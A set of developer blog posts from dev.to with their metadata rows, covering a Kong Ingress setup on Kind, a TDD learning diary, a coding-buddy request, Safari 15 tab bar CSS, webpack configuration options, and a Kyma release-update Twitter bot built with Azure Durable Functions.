Once Kind is installed, you need to create a cluster::
```
kind create cluster
```
After making the cluster, you can interact with it using kubectl. To list your clusters, run:
```
kind get clusters
```
It should return kind, the default cluster context name.
Now run the following to point kubectl to the kind cluster:
```
kind export kubeconfig
```
If you set up Kind correctly, running the following command will give you details about your cluster:
```
kubectl cluster-info
```

### Installing Kong Ingress Controller
Now that we have a cluster running, we can install Kong quickly by applying the manifest directly with the following command:
```
kubectl create -f https://bit.ly/k4k8s
```
Now run the following command to get details on kong-proxy:
```
kubectl -n kong get service kong-proxy
```
You will notice that the external IP is still pending. Kind only exposes the Kubernetes API endpoint, and so the service is not accessible outside of the cluster.

Since we are using Kind, we will have to run a port forward to do this. This command does not get daemonized, so you will have to open another console window to run other commands.
```
kubectl -n kong port-forward --address localhost,0.0.0.0 svc/kong-proxy 8080:80
```
Next, we need to set an environment variable with the IP address from where we want to access Kong. This will be localhost since we are using a port forward.
```
export PROXY_IP=localhost:8080
```
You can curl the IP now or visit in a browser and should see:
```
{"message":"no Route matched with those values"}
```
## Deploying an Example App
Now let's deploy something that will return some results. Kubernetes has multiple example applications available in a[ Github repo](https://github.com/kubernetes/examples). We are going to deploy the[ Guestbook App](https://kubernetes.io/docs/tutorials/stateless-application/guestbook/) with these commands:
```
kubectl apply -f https://k8s.io/examples/application/guestbook/mongo-deployment.yaml
kubectl apply -f https://k8s.io/examples/application/guestbook/mongo-service.yaml
kubectl apply -f https://k8s.io/examples/application/guestbook/frontend-deployment.yaml
kubectl apply -f https://k8s.io/examples/application/guestbook/frontend-service.yaml
```
Now, if we run kubectl get services, we will see two new services:

We can also query the pods to make sure their status is ‘Running’:
```
kubectl get pods -l app.kubernetes.io/name=guestbook -l app.kubernetes.io/component=frontend
```

To test it, you can run another port forward really quick with:
```
kubectl port-forward svc/frontend 8000:80
```
You will find the guestbook running at[ http://localhost:8000/](http://localhost:8000/). We will now set up the Kong Ingress Controller.
## Expose the App to the Internet
Now we can use the Kong Ingress Controller, so we need to set up a resource to serve traffic. We can create a proxy for our application with the following command:
```
echo '
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: guestbook
annotations:
konghq.com/strip-path: "true"
kubernetes.io/ingress.class: kong
spec:
rules:
- http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: frontend
port:
number: 80
' | kubectl apply -f -
```
Now you will see the guestbook app at[ http://localhost:8080/](http://localhost:8080/).
## Using Plugins as Services in Kong
With Kong Ingress, we can execute plugins on the service level. That way, Kong will execute a plugin whenever a request is sent to a specific service, no matter which ingress path from where it came. If we want to add rate limits to our app, we can add the rate limiting plugin to our Kubernetes installation with the following command:
```
echo "
apiVersion: configuration.konghq.com/v1
kind: KongPlugin
metadata:
name: rl-by-ip
config:
minute: 5
limit_by: ip
policy: local
plugin: rate-limiting
" | kubectl apply -f -
kongplugin.configuration.konghq.com/rl-by-ip created
```
Once you install the plugin, you can apply the konghq.com/plugins annotation on our Guestbook with the following command:
```
kubectl patch svc frontend \
-p '{"metadata":{"annotations":{"konghq.com/plugins": "rl-by-ip\n"}}}'
```
If you curl the guestbook app, you will see that rate limiting has been set up.

If you plan on testing the Guestbook frequently during this example, you may want to set the limit higher, or you will run into a Kong error that says the rate limit has been exceeded.
## Configuring an HTTPS Redirect
So far, the app is running on HTTP, and we want it to run on HTTPS. If we want to tell Kong to redirect all the HTTP requests, we can update its annotations to HTTPS and issue a 301 redirect with this command to patch the ingress entry:
```
kubectl patch ingress guestbook -p
'{"metadata":{"annotations":{"konghq.com/protocols":"https","konghq.com/https-redirect-status-code":"301"}}}'
```
To test this using kind, set up another port-forward with the following command:
```
kubectl -n kong port-forward --address localhost,0.0.0.0 svc/kong-proxy 8443:443
```
You can now access a "secure" version of the guestbook at[ https://localhost:8443](https://localhost:8443/). It will not have a certificate, so you will run into warnings in your browser. Let's look at how we can add certificates.
## Adding the Cert-Manager
You can install the cert-manager with the following command:
```
kubectl apply -f
https://github.com/jetstack/cert-manager/releases/download/v1.3.1/cert-manager.yaml
```
Once the images pull down, you can verify that it is running with this command:
```
kubectl get all -n cert-manager
```
You should see something like this:

Since we have Kubernetes running locally with a port-forward, the IP address for the Kong proxy is 127.0.0.1. If you weren’t using a port forward, you could run the following command to find the IP address:
```
kubectl get -o jsonpath="{.status.loadBalancer.ingress[0].ip}" service -n kong kong-proxy
```
But since we are using a port forward, this command will return nothing. If this were in production, you would then set up DNS records to resolve your domain to the IP address you just retrieved. Once that is done, you can request a certificate from Let's Encrypt by running the following, making sure to change the email:
```
echo "apiVersion: cert-manager.io/v1alpha2
kind: ClusterIssuer
metadata:
name: letsencrypt-prod
namespace: cert-manager
spec:
acme:
email: user@example.com #change this email
privateKeySecretRef:
name: letsencrypt-prod
server: https://acme-v02.api.letsencrypt.org/directory
solvers:
- http01:
ingress:
class: kong" | kubectl apply -f -
```
Next, you will have to update your ingress resource to provide a certificate with the following command, changing the domain to your own:
```
echo '
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: guestbook-example-com
annotations:
kubernetes.io/tls-acme: "true"
cert-manager.io/cluster-issuer: letsencrypt-prod
kubernetes.io/ingress.class: kong
spec:
tls:
- secretName: guestbook-example-com
hosts:
- demo.example.com #change this domain/subdomain
rules:
- host: demo.example.com #change this domain/subdomain
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: guestbook
port:
number: 80
' | kubectl apply -f -
```
Once that is updated, the cert-manager will start to provision the certificate and the certificate will be ready soon.
## Missing a Tool in Your K8s Stack?
Kong may be the missing tool in your Kubernetes stack. [Kong Ingress Controller](https://konghq.com/solutions/kubernetes-ingress/?utm_source=guest&utm_medium=devspotlight&utm_campaign=community) can implement authentication, HTTPS redirects, security certificates, and more across all your Kubernetes clusters. Using Kong, you can control your containers, networking, load balancing, rate limiting and more from one platform. It truly is the choice for full-stack ingress deployments. | mbogan |
736,142 | The one about TDD & the Ukulele - WEEK 2 | WEEK 2 JEST was my new best friend and TDD my new enemy. It was natural to write code, THEN test... | 0 | 2021-06-22T22:49:06 | https://dev.to/iqraraza/the-one-about-tdd-week-2-1j9j | beginners, javascript, testing, codenewbie | WEEK 2
JEST was my new best friend and TDD my new enemy. It was natural to write code, THEN test it. Suddenly, I had to do it the other way round. There is method to the madness though.
Red, green refactor...red, green, refactor... was all that was running through my hippocampus whilst washing dishes.
Mock functions and COVE (closed over variable enivroment) was the meal deal of the week.
Sounds complicated ? Is it ! For me anyway. It’s like setting a timer, waiting to go off, and then its times up.
Using the terminal was like my new home. I had become a lot more comfortable with paired programming and making new friends on my cohort. I soon came to realise how important it is to be able to communicate well and have good chemistry when partnering. That being more important than the coding aspect itself.
Everyone I partnered with were on the opposite side of the spectrum to me, however, they were all extremely kind and helpful. I never was made to feel inadequate or stupid.
So grateful.
One of my partner's even played the ukulele during our short lived pairing session. He set the bar too high !
| iqraraza |
736,371 | Looking for a coding buddy | Hello everyone, my name is Programer171(which is not real) and I am 13 years old I love to code in... | 0 | 2021-06-23T06:12:23 | https://dev.to/programer171/looking-for-a-coding-buddy-1ndb | java, html, css, python | Hello everyone, my name is Programer171(which is not real) and I am 13 years old I love to code in java and html and css and I am currently learning python, I am looking for someone around my age to code with me on projects if you would like to be my coding buddy please contact me: Programer171@gmail.com
Peace | programer171 |
736,451 | Using Bottom Tab Bars on Safari iOS 15 | Apple recently announced the latest version of Safari on iOS 15 with a completely new design... | 0 | 2021-06-23T08:51:39 | https://samuelkraft.com/blog/safari-15-bottom-tab-bars-web | tabbar, safari, ios, css | **Apple recently announced the latest version of Safari on iOS 15 with a completely new design featuring a bottom floating tab bar. What does this mean for web developers and designers?**
Safari on iOS has had a problem for a long time when it comes to building websites and web apps with bottom-aligned navigation due to the browser toolbar's dynamic height. As you scroll the toolbar disappears making any element that is fixed to the bottom of the screen look great, but as soon as you try to tap any link inside the browser toolbar appears again.
{% youtube 5QVFKL11nh8 %}
This makes for a really poor UX so designers and developers have mostly resorted to user "hamburger" menus instead. This is a shame as bottom tab bars increase discoverability by not hiding links behind a tap and are also easier to reach one-handed on todays large mobile devices.
## Updates with Safari 15
The new Safari 15 now has a tab bar floating at the bottom of the screen. At first it might seem like this makes it even harder to create tab bar navigations, and by browsing the web using iOS 15 it's easy to spot issues like this:
{% youtube BcS7zV3RzM0 %}
## Fixing Tab Bar Overlap with Safe Areas
Thankfully solving this issue is very easy by using the `env()` CSS function together with `safe-area-inset-bottom`. This API was shipped with iOS 11 making it possible to customize how websites render when using devices with a notch. By inspecting pinterests code we can see that their tab bar has a fixed position anchored to the bottom, the relevant parts look something like this:
```css
.tabbar {
position: fixed;
bottom: 0;
}
```
To respect the safe area and make sure that nothing from the browser UI overlaps let's add another bottom property with `env(safe-area-inset-bottom)` as a value. This function works like a CSS variable, returning the minimum amount of inset needed to keep your UI from overlapping with the browser's. We keep the old style rule as a fallback browsers that do not support it:
```css
.tabbar {
position: fixed;
bottom: 0;
bottom: env(safe-area-inset-bottom);
}
```
Now when scrolling nothing overlaps:
{% youtube KKhn7JHtma0 %}
Be sure to use `env()` every time something is anchored to the bottom of the screen or overlap will likely appear. `env()` can also be combined with css `calc()` or `min()` and `max()`. You can learn more about this and respecting safe-area in [this excellent article](https://webkit.org/blog/7929/designing-websites-for-iphone-x/) published on the webkit blog.
The easiest way to test your websites is to download the Xcode 13 beta from [Apples developer portal](https://developer.apple.com/download/) and using an iOS 15 simulator by going to `Xcode > Open Developer Tool > Simulator`
## Tab Bar UX in iOS 15
Remember the issue in previous versions of Safari where you had to click twice when using bottom tab bars? Once for showing the safari toolbar and another tap for actually triggering your link? That is no longer an issue 🙌. Safari 15 now respects and follows links or buttons, which is a big improvement! Check out how much better Twitter's tabbar works when switching tabs on Safari 15:
{% youtube PvkuL0n4Gqg %}
Even if tab bars now technically work better than before we still have to consider the design and UX to create something that people understand and that looks good. The browser UI is now very bottom-heavy and placing more actions next to it might feel cluttered. What do you think? Let me know on twitter [@samuelkraft](https://twitter.com/samuelkraft).
I'm excited to see how everyone adapts to the new UI and if we will see a return of tab bars on the web or not. | samuelkraft |
736,496 | 6 ways to configure Webpack | Webpack is a build tool to make code, which was not primarily written for execution in browsers,... | 0 | 2021-06-23T15:04:47 | https://dev.to/typescripttv/6-ways-to-configure-webpack-5a33 | javascript, typescript, webdev, beginners | ---
title: 6 ways to configure Webpack
published: true
description:
tags: javascript, typescript, webdev, beginners
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9njibnh4d0ii8crbq08m.png
---
[Webpack](https://webpack.js.org/) is a build tool to make code, which was not primarily written for execution in browsers, executable in web browsers. With special plugins, webpack can manage many types of code, for example JavaScript, TypeScript, and Rust-generated WebAssembly.
There are webpack plugins to also compile, minify, shim, chunk, and bundle code. However, webpack was not designed to execute tasks such as linting, building, or testing your app. For this purpose, there are task runners such as [Grunt](https://gruntjs.com/), [Gulp](https://gulpjs.com/) or [npx](https://docs.npmjs.com/cli/v7/commands/npx).
In order to manage the functionality of webpack, it must be configured. Here are six different ways, in which webpack's configuration can be written.
## 1. Zero Config
As of webpack version 4, you are not required to specify a configuration. By default, webpack assumes that your code starts at `src/index.js` and will be bundled to `dist/main.js`. This is very convenient and promotes [convention over configuration](https://en.wikipedia.org/wiki/Convention_over_configuration) but it does not use webpack's full potential.
Without a configuration, webpack does not know whether code should be compressed for faster execution or bundled with source maps for better tracking of errors. Webpack expresses its confusion with the following warning:
> WARNING in configuration
>
> The 'mode' option has not been set, webpack will fallback to 'production' for this value.
>
> Set 'mode' option to 'development' or 'production' to enable defaults for each environment.
>
> You can also set it to 'none' to disable any default behavior. Learn more: https://webpack.js.org/configuration/mode/
Let's have a look at options to tell webpack how it should be configured.
## 2. Command Line Interface
To see all available commands and options to configure webpack from the command line interface, you can run `webpack --help`. This command will show you a list of arguments and how to use them. The following execution mimics the default (zero config) behaviour of webpack:
```bash
webpack --entry=./src/index.js --output-path=./dist --output-filename=main.js
```
As you can see, CLI configurations can become quite long. In order to minimize the writing effort, there is also a shorthand version of the above command:
```bash
webpack ./src/index.js -o ./dist
```
The simplified notation is at the expense of comprehensibility, which is why we will look at configuration files in the next step.
## 3. CommonJS Configuration File
Webpack can be instructed to read in a configuration file. By default, a file named `webpack.config.js` is being used. You can create it by using the `npx webpack init` command or by writing it yourself:
**webpack.config.js**
```js
const path = require("path");
const config = {
entry: "./src/index.js",
mode: "development",
module: {
rules: [
{
exclude: /(node_modules)/,
test: /\.(js|jsx)$/i,
loader: "babel-loader"
}
]
},
output: {
path: path.resolve(__dirname, "dist")
},
plugins: []
};
module.exports = config;
```
The configuration uses the CommonJS module syntax with `require` and `module.exports`. Make sure that your `package.json` does not define `"type": "module"`, otherwise you will receive the following error:
> [webpack-cli] ReferenceError: require is not defined
The configuration file should also be in the root of your project.
## 4. ESM Configuration File
If your `package.json` file specifies `"type": "module"` and you want to make use of ECMAScript modules, then you can also modernize your webpack configuration:
**webpack.config.js**
```js
import path from "path";
const config = {
entry: "./src/index.js",
mode: "development",
module: {
rules: [
{
exclude: /(node_modules)/,
test: /\.(js|jsx)$/i,
loader: "babel-loader"
}
]
},
output: {
path: path.resolve("./dist")
},
plugins: []
};
export default config;
```
## 5. TypeScript Configuration File
For those of you who like to work with TypeScript, webpack offers the possibility to use a configuration file written in TypeScript.
Webpack v5 already ships with TypeScript definitions, so you don't have to install [@types/webpack](https://www.npmjs.com/package/@types/webpack) but you need to install [typescript](https://www.npmjs.com/package/typescript), [ts-node](https://www.npmjs.com/package/ts-node) and [@types/node](https://www.npmjs.com/package/@types/node).
Because the extension `.ts` does not correspond to the standard `.js` extension, webpack has to be informed about this via the `--config` argument:
```bash
webpack --config webpack.config.ts
```
You also have to make sure that the test patterns of your "rules" and your "resolve" definitions include the TypeScript extension:
**webpack.config.ts**
```ts
import path from "path";
import { Configuration } from "webpack";
const config: Configuration = {
entry: "./src/index.js",
mode: "development",
module: {
rules: [
{
exclude: /(node_modules)/,
test: /\.[tj]sx?$/,
loader: "babel-loader"
}
]
},
output: {
path: path.resolve(__dirname, "./dist")
},
plugins: [],
resolve: {
extensions: [".js", ".jsx", ".ts", ".tsx"]
}
};
export default config;
```
☝️ Because the exemplary webpack configuration loads [Babel](https://babeljs.io/), we can still point to a JavaScript entry file as Babel makes it possible to use JavaScript and TypeScript code simultaneously.
⚠️ Please note that TypeScript configuration files cannot be used with ESM (see [ESM in webpack.config.ts isn't supported](https://github.com/webpack/webpack-cli/issues/2458)).
## 6. Node Interface
In addition to the execution via `webpack-cli`, webpack also supports a programmatic interface. This allows you to compile your frontend code on a Node.js server. Here is an example:
```ts
import express from "express";
import { webpack } from "webpack";
import webpackConfig, { webappDir } from "../webpack.config.js";
export function useWebpack(app: express.Express) {
const webpackCompiler = webpack(webpackConfig);
const webpackDevMiddleware = require("webpack-dev-middleware");
const webpackHotMiddleware = require("webpack-hot-middleware");
app.use(webpackDevMiddleware(webpackCompiler));
app.use(webpackHotMiddleware(webpackCompiler));
app.use(express.static(webappDir));
}
```
Instead of consuming your existing `webpack.config.js` file, you can also pass a configuration object to the `webpack` API.
## Get connected 🔗
Please [follow me on Twitter](https://twitter.com/bennycode) or [subscribe to my YouTube channel](https://www.youtube.com/c/typescripttv) if you liked this post. I would love to hear from you what you are building. 🙂 Best, Benny | bennycode |
736,515 | Say Hello to the Kyma Update Twitter Bot via Azure Durable Functions | Motivation As I would call me a fan of serverless and especially of Azure Functions and... | 0 | 2021-06-27T08:07:38 | https://dev.to/lechnerc77/say-hello-to-the-kyma-update-twitter-bot-by-azure-durable-functions-4e1a | serverless, azure, kyma, durablefunctions | ## Motivation
As I would call me a fan of _serverless_ and especially of _Azure Functions_ and their Durable extension, I am always looking for use-cases on applying them and getting some learning out of it.
Of course I follow the usual suspects in that area like [Marc Duiker](https://dev.to/marcduiker) and the [blog post](https://blog.marcduiker.nl/2019/03/03/creating-azure-functions-updates-twitterbot.html) about his Twitter Bot made me curious.
As I am not a .NET programmer I thought it might be a good chance to develop the same story with TypeScript-based Azure Functions as there are always some "surprises" with Azure Functions when moving away from .NET 😉. In addition I wanted to use some other patterns than used by Marc namely sub-orchestration.
Next I needed a topic for the update notification. As my roots are in the area of SAP there is one favorite open source project that I have: [Kyma](https://kyma-project.io/) which basically is an opinionated stack for developing app extensions on Kubernetes.
So why not post update tweets about new releases published to the GitHub repository (and other related repositories).
In this blog post I will guide you through the journey of developing this bot and highlight what I have learned along the way.
The code is available in [GitHub](https://github.com/lechnerc77/kyma-updates-twitter-bot).
## Process Flow - Requirements
The Twitter bot should have the following process flow:
- The process to check for updates should be triggered on a regular basis (e.g. every 6 hours)
- Based on a configuration that contains the repositories that should be checked a process must be started that executes the following steps for each repository:
- Get the latest release information from GitHub
- Check if a tweet was already sent out for the release. If this is not the case, create a status update on Twitter and store the information about the latest release.
The question is: how can we bring this process to life using Azure Functions i.e. Durable Functions?
In general there are several options. In this blog post I will focus on how to solve it with a pattern called _sub-orchestration_ (see [official documentation](https://docs.microsoft.com/azure/azure-functions/durable/durable-functions-sub-orchestrations)).
## Solution Architecture
Projecting the process flow to the solution space of Azure Functions and Durable Functions lead me to the following architecture:
- The trigger for the process is a _timer-based Function_ that calls a Durable Orchestrator.
- The Durable Orchestrator contains two sequential steps:
- Call of an _Activity Function_ that fetches the configuration from an Azure Storage Table.
- For each entry in the configuration the orchestrator must fetch the current GitHub release, check if there was already a Tweet about it and react accordingly.
The second step in the Durable Orchestrator can be done via a [Fan-in/Fan-Out pattern](https://docs.microsoft.com/azure/azure-functions/durable/durable-functions-cloud-backup) or via a [sub-orchestration](https://docs.microsoft.com/azure/azure-functions/durable/durable-functions-sub-orchestrations).
I decided to use the later one as it seems quite natural to me to encapsulate the process steps in a dedicated orchestration as a self-contained building block.
So the second step in my main orchestrator is the call of a second orchestrator that comprises the following steps for each repository to check:
- Get the information from GitHub via an Activity Function.
- Get the information about the tweet history for the repository from a history table stored in another Azure Table via an Activity Function.
- Decide if an update is necessary. If this is the case trigger:
- an Activity Function to send the tweet.
- an Activity Function to update the History table.
In one picture this looks like this:

In order to store the API keys for the interaction with the Twitter API I used Azure Key Vault that can be integrated with a Function App.
## Development Setup
I did all my development locally on a Windows machine making use of [Visual Studio Code](https://code.visualstudio.com/) and the [Azure Functions Extension](https://marketplace.visualstudio.com/items?itemName=ms-azuretools.vscode-azurefunctions).
As I use Durable Functions and store some configuration in Azure Tables I needed a Storage Emulator for the local development. I used [Azurite]( https://docs.microsoft.com/azure/storage/common/storage-use-azurite) for that and the [Storage Explorer](https://azure.microsoft.com/features/storage-explorer/) to have some insights.
Of course do not forget to point the Functions to the emulator by setting the property `AzureWebJobsStorage` in the `local.settings.json` file to `UseDevelopmentStorage=true`
Now let us walk through the single components of the solution and highlight some specifics that crossed my path along the way.
## Solution Components
### Azure Storage
Let's start with the persistency for the configuration and the history. For that I created two tables:
- one to store the configuration (`SourceRepositoryConfiguration`) i.e. which repositories to look at, what are the hashtags to be used etc.
- one to store the history of our updates (`RepositoryUpdateHistory`) i.e. what was the latest release that we tweeted about.
Here is how the configuration `SourceRepositoryConfiguration` looks like:

And here how an entry in the history table `RepositoryUpdateHistory` looks like:

With this in place, let's move on to the Azure Functions part of the story.
### Timer-based Function
The entry point to the Orchestration is a timer based Function. The creation via the Azure Functions extension is straight-forward.
I adopted the `function.json` file to start every six hours, by setting the corresponding value:
```json
"schedule": "0 0 */6 * * *"
```
In addition, we need to make the Azure Function runtime aware that this Function can trigger an orchestration. To do so, we add the corresponding binding in the `function.json` file:
```json
{
"name": "starter",
"type": "orchestrationClient",
"direction": "in"
}
```
We must then adopt the code of the timer-based Function to call the main Orchestrator Function. The final code looks like this:
```javascript
import * as df from "durable-functions"
import { AzureFunction, Context } from "@azure/functions"
const timerTrigger: AzureFunction = async function (context: Context, myTimer: any): Promise<void> {
const client = df.getClient(context)
const instanceId = await client.startNew(process.env["MainOrchestratorName"], undefined, undefined)
context.log(`Started timer triggered orchestration with ID = '${instanceId}'.`)
}
export default timerTrigger
```
As you can see I did not hard-code the name of the main orchestrator that should be called, but provide it via an environment variable.
That's all to get the orchestration party started 🥳
> 💡 However, during local development I wanted to trigger the orchestration manually and therefore I also created an HTTP triggered Function, to be able to do so.
As a spoiler, I also deployed that Function to Azure, but I deactivated it. It serves me as a backup to trigger the process manually in production if I want or need to.
### The Main Orchestrator
As described in the architecture overview, I have one main Orchestrator Function that comprises two steps:
1. Call an Activity Function to retrieve the information which repositories to check (the `Config Reader` Activity Function)
2. For each repository that should be watched, schedule a sub-orchestration with the process steps containing the "business logic". The orchestrator gets the configuration data as input.
There is not too much code needed to achieve this: for each entry in the configuration a sub-orchestration is set up and then scheduled by the main orchestrator:
```javascript
const configuration = yield context.df.callActivity("KymaUpdateBotConfigReader")
if (configuration) {
const updateTasks = []
for (const configurationEntry of configuration) {
const child_id = context.df.instanceId + `:${configurationEntry.RowKey}`
const updateTask = context.df.callSubOrchestrator("KymaUpdateBotNewsUpdateOrchestrator", configurationEntry, child_id)
updateTasks.push(updateTask)
}
if (context.df.isReplaying === false) {
context.log.info(`Starting ${updateTasks.length} sub-orchestrations for update`)
}
yield context.df.Task.all(updateTasks)
}
```
> ⚠ There is one strange behavior that I encountered. The daat fetched from the configuration has column names that start with a capital letter as in the Azure Storage Table (e.g. __R__epositoryOwner). After transferring the object to the sub-orchestrator it seems that some JSON manipulation takes place and the name in the input parameter of the sub-orchestrator will start with a small letter (e.g. __r__epositoryOwner). This needs to be kept in mind, otherwise you will be surprised when you assign the data later in the processing.
### The Config Reader Activity Function
The reading of the configuration can be solved declaratively via _input binding_. For the sake of the later evaluation I only want to get the entries that are marked as `isActive` which can be achieved via a filter.
So the whole magic for this Function happens in the `function.json` file:
```json
{
"name": "repositoryConfiguration",
"type": "table",
"connection": "myStorageConnectionString",
"tableName": "SourceRepositoryConfiguration",
"partitionKey": "Repositories",
"filter": "(IsActive eq true)",
"direction": "in"
}
```
The Function itself returns the fetched data to the caller.
> ⚠ The official documentation for JavaScript Functions states that you must not use the `rowKey` and `partitionKey` parameters. However, they do work and I could not see any impact on the behavior. So I did not pass the partition key as a OData filter parameter and opened a issue on the documentation [https://github.com/MicrosoftDocs/azure-docs/issues/77103](https://github.com/MicrosoftDocs/azure-docs/issues/77103).
### The Sub-Orchestrator
As mentioned in the previous section the main process logic is orchestrated by the sub-orchestrator.
From the perspective of the Function Configuration it is another Azure Functions Orchestrator, so nothing special there.
The orchestrator executes the following steps:
1. Call an Activity Function to get the latest release from the GitHub repository (`GitHub Reader` Activity Function).
2. Call an Activity Function to retrieve the information about the last update that was executed by this Twitter bot stored in an Azure Storage table (`History Reader` Activity Function).
3. Check if a new release exists. If this is the case tweet an update about the new release (`Update Twitter Sender` Activity Function) and store the updated information into the history table (`History Update` Activity Function).
When you look at the code in the repository there is a bit more happening around, as I can influence the behavior of the orchestration to suppress sending tweets and to suppress the update of the table for the sake of testing and analysis options. Basically a lot of `if` clauses.
As things can go wrong when calling downstream system I call the Activity Function with a _retry setup_ (`callActivityWithRetry`) to avoid immediate failures in case of hiccups in the downstream systems. The configuration parameters are injected via environment parameters from the Function App settings.
Let us now take a look at the single activities that are called throughout this orchestration.
### The GitHub Reader Activity Function
The setup for querying the GitHub repositories is done via the
[GitHub REST endpoints](https://docs.github.com/en/rest/overview/resources-in-the-rest-api).
As the number of calls is quite limited in my scenario, I use the publicly available endpoints so no authentication is needed. The restrictions that come along with respect to the number of calls per hour do not apply in my case, so I am fine with that.
For the sake of convenience I use the `@octokit/core` SDK that helps you a lot with interacting with the endpoints.
The logic for getting the data boil down to three lines of code:
```javascript
const octokit = new Octokit()
const requestUrl = `/repos/${context.bindings.configuration.repositoryOwner.toString()}/${context.bindings.configuration.repositoryName.toString()}/releases/latest`
const repositoryInformation = await octokit.request(requestUrl)
```
The Activity Function curates the relevant information for the further processing from the result and returns it to the orchestrator.
### The History Reader Activity Function
In this Activity Function we fetch the historical information from our storage for the repository that we want to check to find out which was the latest version we were aware of.
Although the requirement is the same as for reading the configuration, the filtering needs a bit more input namely the repository owner and the repository name. Although this data is transferred into the Function via the activity trigger, it is not accessible via for the declarative definition of the Table input binding (or at least I did not manage to access it).
Therefore I read the whole history table via the input binding and then filter the corresponding entries in the Activity Function code. As the number of entries is not that large, there shouldn't be a big performance penalty.
The binding itself is therefore quite basic:
```json
{
"name": "updateHistory",
"type": "table",
"connection": "myStorageConnectionString",
"tableName": "RepositoryUpdateHistory",
"partitionKey": "History",
"direction": "in"
}
```
And the filtering of the desired entry looks like this:
```javascript
const result = <JSON><any>context.bindings.updateHistory.find( entry => ( entry.RepositoryOwner === context.bindings.configuration.repositoryOwner && entry.RepositoryName === context.bindings.configuration.repositoryName))
```
With this information the orchestrator can now decide if a tweet needs to be sent and consequently the history table must be updated. The following sections describe the Activity Functions needed to achieve this.
### The Update Twitter Sender Activity Function
If a tweet should be sent out, we need to call the Twitter API. In contrast to the GitHub Activity we eed a registered as a developer in the Twitter developer portal and also register an app in that portal to be able to do so. This is well described in the official documentation (see [developer.twitter.com](https://developer.twitter.com/)).
With this in place we "just" need to to make an authenticated call to the Twitter API, right? This is where the fun starts ...
There is no official tool, library or SDK for that (see [Twitter developer platform - Tools and Libraries](https://developer.twitter.com/en/docs/twitter-api/tools-and-libraries)). There are some community contributions but most of them are outdated and/or reference outdated npm packages including some with security vulnerabilities.
I finally ended up with [twitter-lite
](https://www.npmjs.com/package/twitter-lite) that has TypeScript support and takes over the burden of authentication.
However, for TypeScript based implementations you must take care on the import as discussed in this [GitHub issue](https://github.com/draftbit/twitter-lite/issues/111).
Using the following import works:
```javascript
const TwitterClient = require('twitter-lite')
```
The final code then looks like this:
```javascript
const tweetText = buildTweet(context)
try {
const client = new TwitterClient({
consumer_key: process.env["TwitterApiKey"],
consumer_secret: process.env["TwitterApiSecretKey"],
access_token_key: process.env["TwitterAccessToken"],
access_token_secret: process.env["TwitterAccessTokenSecret"]
})
const tweet = await client.post("statuses/update", {
status: tweetText
})
context.log.info(`Tweet successfully sent: ${tweetText}`)
} catch (error) {
context.log.error(`The call of the Twitter API caused an error: ${error}`)
}
```
The text of the is build via a combination of free text, the news from GitHub and the data from the configuration table where I kept my hashtags.
Here one example of an tweet issued by the bot:

### The History Update Activity Function
The last step of the orchestration is the update of the entry in the history table to remember the latest version that we tweeted about.
As we want to either insert a new value into the table (if we tweeted for the first time) or update an existing entry, we cannot use the Table Output binding as this one only allows inserts (and be assured I tried to update via that binding 😉).
So I update the table entries via code, which is okay (do not be too "religious" about bindings). I used the [Microsoft Azure Storage SDK for Node.js and JavaScript](https://github.com/Azure/azure-storage-node). This SDK is quite cumbersome to use, as it relies on callback functions. I wrapped them using the pattern described in this [blog post](https://blog.maximerouiller.com/post/wrapping-nodejs-azure-table-storage-api-to-enable-async-await/) by [Maxime Rouiller](https://dev.to/maximrouiller).
With that the code looks like this:
```javascript
const tableSvc = AzureTables.createTableService(process.env["myStorageConnectionString"])
const entGen = AzureTables.TableUtilities.entityGenerator
let tableEntry = {
PartitionKey: entGen.String(process.env["HistoryPartitionKeyValue"]),
RowKey: entGen.String(context.bindings.updateInformation.RowKey),
RepositoryOwner: entGen.String(context.bindings.updateInformation.RepositoryOwner),
RepositoryName: entGen.String(context.bindings.updateInformation.RepositoryName),
Name: entGen.String(context.bindings.updateInformation.Name),
TagName: entGen.String(context.bindings.updateInformation.TagName),
PublishedAt: entGen.DateTime(context.bindings.updateInformation.PublishedAt),
HtmlURL: entGen.String(context.bindings.updateInformation.HtmlUrl),
UpdatedAt: entGen.DateTime(new Date().toISOString())
}
const result = await insertOrMergeEntity(tableSvc, process.env["HistoryEntityName"], tableEntry)
```
In the meantime an new library arrived ([Link](https://github.com/Azure/azure-sdk-for-js/tree/main/sdk/tables/data-tables)) that support state-of-the-art JavaScript and TypeScript. To be honest, I was too lazy to switch, as the API changed a bit or maybe I just wanted to keep some work for later improvement ... who knows 😇
With that we are through the implementation of the single Functions. Let us take a look at the surroundings of the development in the next sections.
## Some Points about Local Development
As I mentioned before, I did the complete development locally and here some points I think are worth to mention:
- The storage emulator _Azurite_ works like a charm. So no need to rely to the outdated Azure Storage emulator. You can and should switch to Azurite.
- I wanted to switch off the timer trigger Function during development as I relied on the HTTP triggered Function to start the orchestration. To achieve this you need one setting in the `local.settings.json` file namely `"AzureWebJobs.[NameOfTheFunction].Disabled": true`. The Function runtime will do some sanity checks on the Function despite of that setting that made me aware of an error in the Function. That's cool imho.
- As I used Azurite for the local development I had the corresponding setting of `"AzureWebJobsStorage": "UseDevelopmentStorage=true"` in my `local.setting.json` file. I decided to use a different storage for my configuration and history table. which means you must specify the connection string to that storage in your Functions that make use of the non-default storage ... which you might forget when you do the local development. For the sake of science I made that error (or I just forgot the setting .. who knows) and be assured you will become aware of that when you deploy the Function. So specify that connection in your bindings in case you deviate from the default storage attached to your Function like in my case:
```json
"connection": "myStorageConnectionString"
```
## Deployment via GitHub Actions
In order to deploy my Functions to Azure I made use of _GitHub Actions_. I must state: I was stunned how smooth the deployment went through.
I followed the official documentation ([Link](https://docs.microsoft.com/azure/azure-functions/functions-how-to-github-actions?tabs=javascript)) and used the pre-defined [template](https://github.com/Azure/actions-workflow-samples/blob/master/FunctionApp/windows-node.js-functionapp-on-azure.yml) and it worked out of the box.
The only adoption I made was to exclude files from triggering the action e. g. the markdown files via:
```yaml
on:
push:
branches:
- main
paths-ignore:
- "**.md"
```
With the improvements that GitHub is pushing towards Actions (like environments etc.) I think that this is the path to following along in the future.
### Setup in Azure
I did the setup of the main resources in Azure manually (no Terraform, no Bicep .. and yes shame on me for that - having said that I will definitely take a look at Bicep and try to replicate the setup with it).
Nevertheless some remarks on my setup and what I have seen/learned
